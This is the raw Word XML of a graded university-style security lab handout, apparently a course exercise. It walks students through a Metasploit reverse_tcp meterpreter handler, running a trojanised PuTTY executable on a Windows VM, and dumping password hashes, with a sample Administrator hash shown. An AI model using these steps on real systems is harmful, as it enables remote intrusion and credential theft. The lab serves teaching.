        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86BC6" w:rsidRPr="00A31B07" w:rsidRDefault="00E86BC6" w:rsidP="00E86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u w:val="single"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00524E36" w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>use exploit/multi/handler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E86BC6" w:rsidRDefault="00E86BC6" w:rsidP="00E86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en-NZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B321FB" w:rsidRDefault="000B526F" w:rsidP="00E86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szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve">We can check the options that this specific </w:t>
      </w:r>
      <w:r w:rsidR="00524E36">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>exploit handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses by running:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B526F" w:rsidRDefault="000B526F" w:rsidP="00E86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szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B526F" w:rsidRPr="00A31B07" w:rsidRDefault="000B526F" w:rsidP="000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u w:val="single"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; show options</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B526F" w:rsidRPr="007F05D8" w:rsidRDefault="000B526F" w:rsidP="00E86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szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E86BC6" w:rsidRDefault="00B75B34" w:rsidP="00983119">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>We will set the following options. Noticed how they correlate to the information we used to create the malicious PuTTy executable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B526F" w:rsidRDefault="000B526F" w:rsidP="00983119">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00707F53" w:rsidRPr="00A31B07" w:rsidRDefault="00707F53" w:rsidP="0070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u w:val="single"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00524E36" w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>set PAYLOAD windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00707F53" w:rsidRPr="00A31B07" w:rsidRDefault="000A4350" w:rsidP="000A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u w:val="single"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:r w:rsidR="00524E36" w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>set LHOST 192.168.1</w:t>
      </w:r>
      <w:r w:rsidR="00B75B34">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00524E36" w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>.11</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524E36" w:rsidRPr="00A31B07" w:rsidRDefault="00524E36" w:rsidP="000A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u w:val="single"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; set LPORT 443</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524E36" w:rsidRPr="00A31B07" w:rsidRDefault="00524E36" w:rsidP="000A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u w:val="single"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0073557A" w:rsidRDefault="0073557A" w:rsidP="000A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 w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00524E36" w:rsidRPr="00A31B07" w:rsidRDefault="00524E36" w:rsidP="0052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lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve">[*] Started reverse TCP handler on 192.168.19.11:443 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524E36" w:rsidRPr="00A31B07" w:rsidRDefault="00524E36" w:rsidP="0052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lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>[*] Starting the payload handler...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524E36" w:rsidRPr="00A31B07" w:rsidRDefault="00524E36" w:rsidP="0052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lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>[*] Sending stage (957999 bytes) to 192.168.19.12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B75B34" w:rsidRDefault="00B75B34" w:rsidP="0052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p>
    <w:p w:rsidR="00B75B34" w:rsidRDefault="00B75B34" w:rsidP="00B7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Cs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>This is the final stage of the attack. Switch to the Microsoft Windows machine, open the shared folder. Double click the PuTTyX.exe file, make sure you use the file with the “X” on appended to the end.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B75B34" w:rsidRDefault="00B75B34" w:rsidP="00B7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Cs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B75B34" w:rsidRDefault="00B75B34" w:rsidP="00B75B34">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00042737">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251719680" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="522EFFDD" wp14:editId="701AB45F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>435610</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5705475" cy="8667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66775"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w:rsidR="009E49A9" w:rsidRDefault="009E49A9" w:rsidP="00B75B34">
                            <w:r>
                              <w:t>Open File – Security Warning:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="00B75B34" w:rsidRDefault="00B75B34" w:rsidP="00B75B34">
                            <w:r>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r w:rsidR="00293FAC">
                              <w:t>Unknown Publisher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EFFDD" id="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:398.05pt;margin-top:34.3pt;width:449.25pt;height:68.25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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="009E49A9" w:rsidRDefault="009E49A9" w:rsidP="00B75B34">
                      <w:r>
                        <w:t>Open File – Security Warning:</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="00B75B34" w:rsidRDefault="00B75B34" w:rsidP="00B75B34">
                      <w:r>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidR="00293FAC">
                        <w:t>Unknown Publisher</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="004F2FC0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Q5</w:t>
      </w:r>
      <w:r w:rsidRPr="00042737">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>What happened on the Microsoft Windows machine when we ran our malicious PuTTy program?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B75B34" w:rsidRDefault="00B75B34" w:rsidP="00B7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Cs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B75B34" w:rsidRPr="00B75B34" w:rsidRDefault="00B75B34" w:rsidP="00B7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Cs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch back Kali Linux… you should now have a meterpreter session opened! </w:t>
      </w:r>
      <w:r w:rsidR="0073557A">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>And the output should look similar to that below:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B75B34" w:rsidRDefault="00B75B34" w:rsidP="0052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p>
    <w:p w:rsidR="00524E36" w:rsidRPr="00A31B07" w:rsidRDefault="00524E36" w:rsidP="0052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lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>[*] Meterpreter session 2 opened (192.168.19.11:443 -&gt; 192.168.19.12:1025) at 2017-03-14 22:42:48 -0400</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00524E36" w:rsidRPr="00A31B07" w:rsidRDefault="00524E36" w:rsidP="0052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p>
    <w:p w:rsidR="00524E36" w:rsidRPr="00A31B07" w:rsidRDefault="00524E36" w:rsidP="0052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urier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A31B07">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <w:t>meterpreter &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A4350" w:rsidRDefault="000A4350" w:rsidP="00983119">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000B526F" w:rsidRDefault="004F2FC0" w:rsidP="00983119">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Refer back to the lecture slides and look at some of the resources about meterpreter. </w:t>
      </w:r>
      <w:r w:rsidR="00B163E8">
        <w:t>Try to find an option/command to acquire the username and password hashes from the Windows system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA4715" w:rsidRDefault="00BA4715" w:rsidP="00983119">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B163E8" w:rsidRDefault="000D220A" w:rsidP="00B163E8">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00042737">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:eastAsia="en-NZ"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251721728" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5B38797E" wp14:editId="2099B855">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>330835</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5705475" cy="8667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66775"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w:rsidR="00B163E8" w:rsidRDefault="00B163E8" w:rsidP="00B163E8">
                            <w:r>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r w:rsidR="009E49A9">
                              <w:t>Getuid: Administrator</w:t>
                            </w:r>
                          </w:p>
                          <w:p w:rsidR="009E49A9" w:rsidRDefault="009E49A9" w:rsidP="00B163E8">
                            <w:r>
                              <w:t xml:space="preserve">Hashdump: </w:t>
                            </w:r>
                            <w:r w:rsidRPr="009E49A9">
                              <w:t>Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::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8797E" id="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:398.05pt;margin-top:26.05pt;width:449.25pt;height:68.2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">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w:rsidR="00B163E8" w:rsidRDefault="00B163E8" w:rsidP="00B163E8">
                      <w:r>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidR="009E49A9">
                        <w:t>Getuid: Administrator</w:t>
                      </w:r>
                    </w:p>
                    <w:p w:rsidR="009E49A9" w:rsidRDefault="009E49A9" w:rsidP="00B163E8">
                      <w:r>
                        <w:t xml:space="preserve">Hashdump: </w:t>
                      </w:r>
                      <w:r w:rsidRPr="009E49A9">
                        <w:t>Administrator:500:921988ba001dc8e14a3b108f3fa6cb6d:e19ccf75ee54e06b06a5907af13cef42:::</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00B163E8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Q7</w:t>
      </w:r>
      <w:r w:rsidR="00B163E8" w:rsidRPr="00042737">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B163E8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B163E8">
        <w:t>Document the username/password hashes on the Windows system.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA4715" w:rsidRDefault="00BA4715" w:rsidP="00983119">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000671CA" w:rsidRDefault="000671CA" w:rsidP="00983119">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000D220A" w:rsidRDefault="000D220A" w:rsidP="00983119">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="000D220A" w:rsidSect="00C23FA8">
      <w:headerReference w:type="default" r:id="rId8"/>
      <w:footerReference w:type="default" r:id="rId9"/>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454" w:rsidRDefault="006C2454" w:rsidP="00C71E11">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="006C2454" w:rsidRDefault="006C2454" w:rsidP="00C7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024003"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr/>
    <w:sdtContent>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1769616900"/>
          <w:docPartObj>
            <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
            <w:docPartUnique/>
          </w:docPartObj>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:p w:rsidR="003E6BB5" w:rsidRDefault="003E6BB5" w:rsidP="00C71E11">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795EE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5EE5">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:sdtContent>
      </w:sdt>
    </w:sdtContent>
  </w:sdt>
  <w:p w:rsidR="003E6BB5" w:rsidRDefault="003E6BB5" w:rsidP="00C71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454" w:rsidRDefault="006C2454" w:rsidP="00C71E11">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="006C2454" w:rsidRDefault="006C2454" w:rsidP="00C7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BB5" w:rsidRDefault="001C3C32" w:rsidP="00C71E11">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="right"/>
    </w:pPr>
    <w:r>
      <w:t>LAB-5</w:t>
    </w:r>
    <w:r w:rsidR="00CD3F2E">
      <w:t>-2-GRADED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121A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="667C2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C44F51"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2A44DF22"/>
    <w:lvl w:ilvl="0" w:tplc="1409000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>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2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1F4E2816"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="249E2D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6324B26"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2EE0C4B4"/>
    <w:lvl w:ilvl="0" w:tplc="CE7A9BE8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Aria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8FD25FA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F02C7F54"/>
    <w:lvl w:ilvl="0" w:tplc="1409000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="594C25FE">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A292153"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="543E5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B71496F"/>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2115F9A"/>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B8D5A39"/>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0942ACC"/>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8"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="5"/>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F0"/>
    <w:rsid w:val="00002BFC"/>
    <w:rsid w:val="000061E8"/>
    <w:rsid w:val="000070A2"/>
    <w:rsid w:val="0003049F"/>
    <w:rsid w:val="00041ED2"/>
    <w:rsid w:val="00042737"/>
    <w:rsid w:val="00044AF9"/>
    <w:rsid w:val="000524F9"/>
    <w:rsid w:val="00062D20"/>
    <w:rsid w:val="000671CA"/>
    <w:rsid w:val="000700B1"/>
    <w:rsid w:val="0007096C"/>
    <w:rsid w:val="00075A5B"/>
    <w:rsid w:val="000807A6"/>
    <w:rsid w:val="000A4350"/>
    <w:rsid w:val="000A77B1"/>
    <w:rsid w:val="000B44CB"/>
    <w:rsid w:val="000B526F"/>
    <w:rsid w:val="000C14B8"/>
    <w:rsid w:val="000D10C7"/>
    <w:rsid w:val="000D1C99"/>
    <w:rsid w:val="000D220A"/>
    <w:rsid w:val="000D2CBD"/>
    <w:rsid w:val="000D38B6"/>
    <w:rsid w:val="000D3910"/>
    <w:rsid w:val="000D48E4"/>
    <w:rsid w:val="000D4962"/>
    <w:rsid w:val="000F465A"/>
    <w:rsid w:val="00100397"/>
    <w:rsid w:val="0011230F"/>
    <w:rsid w:val="00124CC0"/>
    <w:rsid w:val="00126BEA"/>
    <w:rsid w:val="0014684A"/>
    <w:rsid w:val="00152906"/>
    <w:rsid w:val="00156BD5"/>
    <w:rsid w:val="00162129"/>
    <w:rsid w:val="0016575D"/>
    <w:rsid w:val="00174E21"/>
    <w:rsid w:val="00177752"/>
    <w:rsid w:val="001801E5"/>
    <w:rsid w:val="001853DA"/>
    <w:rsid w:val="00186A78"/>
    <w:rsid w:val="00186C50"/>
    <w:rsid w:val="00193553"/>
    <w:rsid w:val="001C1328"/>
    <w:rsid w:val="001C3C31"/>
    <w:rsid w:val="001C3C32"/>
    <w:rsid w:val="001D00C1"/>
    <w:rsid w:val="001D3AA2"/>
    <w:rsid w:val="001E747B"/>
    <w:rsid w:val="001F00E4"/>
    <w:rsid w:val="001F0213"/>
    <w:rsid w:val="00250C19"/>
    <w:rsid w:val="00251DE7"/>
    <w:rsid w:val="00252777"/>
    <w:rsid w:val="0025310C"/>
    <w:rsid w:val="0026580D"/>
    <w:rsid w:val="00291A57"/>
    <w:rsid w:val="00293FAC"/>
    <w:rsid w:val="00294422"/>
    <w:rsid w:val="00294751"/>
    <w:rsid w:val="002A2405"/>
    <w:rsid w:val="002B00D6"/>
    <w:rsid w:val="002B7C35"/>
    <w:rsid w:val="002B7EFE"/>
    <w:rsid w:val="002D2520"/>
    <w:rsid w:val="002E28B7"/>
    <w:rsid w:val="002E78DB"/>
    <w:rsid w:val="002F4359"/>
    <w:rsid w:val="0032386E"/>
    <w:rsid w:val="00324056"/>
    <w:rsid w:val="00353EB8"/>
    <w:rsid w:val="00355EC0"/>
    <w:rsid w:val="003602D0"/>
    <w:rsid w:val="003708DF"/>
    <w:rsid w:val="0038281D"/>
    <w:rsid w:val="003917A2"/>
    <w:rsid w:val="00393892"/>
    <w:rsid w:val="003A6C7F"/>
    <w:rsid w:val="003A7B44"/>
    <w:rsid w:val="003B58DD"/>
    <w:rsid w:val="003B75D3"/>
    <w:rsid w:val="003B784A"/>
    <w:rsid w:val="003C322B"/>
    <w:rsid w:val="003C3FD1"/>
    <w:rsid w:val="003D5E95"/>
    <w:rsid w:val="003E3038"/>
    <w:rsid w:val="003E6BB5"/>
    <w:rsid w:val="003F4810"/>
    <w:rsid w:val="003F6B05"/>
    <w:rsid w:val="00411B76"/>
    <w:rsid w:val="00412BCF"/>
    <w:rsid w:val="004354C9"/>
    <w:rsid w:val="00436C3D"/>
    <w:rsid w:val="00440C6C"/>
    <w:rsid w:val="00454BFE"/>
    <w:rsid w:val="0049208E"/>
    <w:rsid w:val="004A5672"/>
    <w:rsid w:val="004B5068"/>
    <w:rsid w:val="004C64D7"/>
    <w:rsid w:val="004D0F5A"/>
    <w:rsid w:val="004D27E8"/>
    <w:rsid w:val="004F2FC0"/>
    <w:rsid w:val="004F4454"/>
    <w:rsid w:val="00511332"/>
    <w:rsid w:val="005208F5"/>
    <w:rsid w:val="005227C1"/>
    <w:rsid w:val="00524E36"/>
    <w:rsid w:val="005405F6"/>
    <w:rsid w:val="0054213C"/>
    <w:rsid w:val="0055686F"/>
    <w:rsid w:val="00573FEE"/>
    <w:rsid w:val="00581F8D"/>
    <w:rsid w:val="0058204C"/>
    <w:rsid w:val="005838B2"/>
    <w:rsid w:val="00595B2C"/>
    <w:rsid w:val="00597139"/>
    <w:rsid w:val="005A2E4C"/>
    <w:rsid w:val="005B2B47"/>
    <w:rsid w:val="005C17FA"/>
    <w:rsid w:val="005F521A"/>
    <w:rsid w:val="005F5244"/>
    <w:rsid w:val="00611CE9"/>
    <w:rsid w:val="00627592"/>
    <w:rsid w:val="00630154"/>
    <w:rsid w:val="00630E3A"/>
    <w:rsid w:val="006406F2"/>
    <w:rsid w:val="00653201"/>
    <w:rsid w:val="006604C5"/>
    <w:rsid w:val="006610FC"/>
    <w:rsid w:val="00662556"/>
    <w:rsid w:val="006659CC"/>
    <w:rsid w:val="00665D06"/>
    <w:rsid w:val="006700C1"/>
    <w:rsid w:val="00673426"/>
    <w:rsid w:val="00687279"/>
    <w:rsid w:val="00692B54"/>
    <w:rsid w:val="00695664"/>
    <w:rsid w:val="006A161A"/>
    <w:rsid w:val="006A2DC4"/>
    <w:rsid w:val="006A534E"/>
    <w:rsid w:val="006A7EE7"/>
    <w:rsid w:val="006B1AF7"/>
    <w:rsid w:val="006B2BF0"/>
    <w:rsid w:val="006B6189"/>
